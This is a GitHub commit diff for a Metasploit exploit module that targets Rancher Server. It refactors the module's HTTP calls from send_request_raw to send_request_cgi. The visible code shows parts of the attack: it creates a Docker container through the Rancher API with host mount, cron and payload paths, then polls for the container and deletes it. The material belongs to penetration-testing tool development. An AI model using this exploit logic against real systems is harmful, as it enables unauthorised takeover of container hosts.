Skip to content

Commit e3326e1

Browse files
mpizalampizala
committed
Use send_request_cgi instead of raw
1 parent 701d628 commit e3326e1

File tree

1 file changed

+13
-8
lines changed

1 file changed

+13
-8
lines changed

modules/exploits/linux/http/rancher_server.rb

Lines changed: 13 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -59,10 +59,11 @@ def initialize(info = {})
5959
end
6060

6161
def del_container(rancher_container_id, container_id)
62-
res = send_request_raw(
62+
res = send_request_cgi(
6363
'method' => 'DELETE',
64-
'headers' => { 'Accept' => 'application/json' },
65-
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id)
64+
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id),
65+
'ctype' => 'application/json',
66+
'headers' => { 'Accept' => 'application/json' }
6667
)
6768
return vprint_good('The docker container has been removed.') if res && res.code == 200
6869

@@ -105,9 +106,10 @@ def make_container(mnt_path, cron_path, payload_path, container_id)
105106
end
106107

107108
def check
108-
res = send_request_raw(
109+
res = send_request_cgi(
109110
'method' => 'GET',
110111
'uri' => normalize_uri(target_uri.path),
112+
'ctype' => 'application/json',
111113
'headers' => { 'Accept' => 'application/json' }
112114
)
113115

@@ -127,9 +129,10 @@ def check
127129

128130
environments = JSON.parse(res.body)['data']
129131
environments.each do |e|
130-
res = send_request_raw(
132+
res = send_request_cgi(
131133
'method' => 'GET',
132134
'uri' => normalize_uri(target_uri.path, e['id'], 'hosts'),
135+
'ctype' => 'application/json',
133136
'headers' => { 'Accept' => 'application/json' }
134137
)
135138

@@ -179,10 +182,11 @@ def exploit
179182
container_id = make_container_id
180183

181184
# deploy docker container
182-
res = send_request_raw(
185+
res = send_request_cgi(
183186
'method' => 'POST',
184187
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers'),
185-
'headers' => { 'Accept' => 'application/json', 'Content-Type' => 'application/json' },
188+
'ctype' => 'application/json',
189+
'headers' => { 'Accept' => 'application/json' },
186190
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
187191
)
188192
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
@@ -203,9 +207,10 @@ def exploit
203207
sleep(sleep_time)
204208
wait_time -= sleep_time
205209

206-
res = send_request_raw(
210+
res = send_request_cgi(
207211
'method' => 'GET',
208212
'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', '?name=' + container_id),
213+
'ctype' => 'application/json',
209214
'headers' => { 'Accept' => 'application/json' }
210215
)
211216
next unless res.code == 200 and res.body.include? 'stopped'

0 commit comments

Comments
 (0)